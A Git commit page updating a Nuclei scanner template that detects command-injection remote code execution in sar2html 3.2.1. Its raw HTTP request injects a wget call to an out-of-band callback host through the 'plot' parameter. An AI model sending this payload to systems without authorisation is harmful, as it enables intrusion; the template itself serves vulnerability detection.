daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update sar2html-rce.yaml

patch-1
Prince Chaddha 2021-08-12 15:03:49 +05:30 committed by GitHub
parent 0d2b53e71d
commit cfc534af89
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
vulnerabilities/other/sar2html-rce.yaml
View File

@ -1,26 +1,24 @@
id: sar2html-rce
info:
name: Sar2HTML - Remote Code Execution
name: sar2html 3.2.1 - 'plot' Remote Code Execution
author: gy741
severity: critical
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
reference: |
- https://www.exploit-db.com/exploits/49344
tags: sar2html,mirai,rce,oob
tags: sar2html,rce,oob
requests:
- raw:
- |
GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
unsafe: true
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction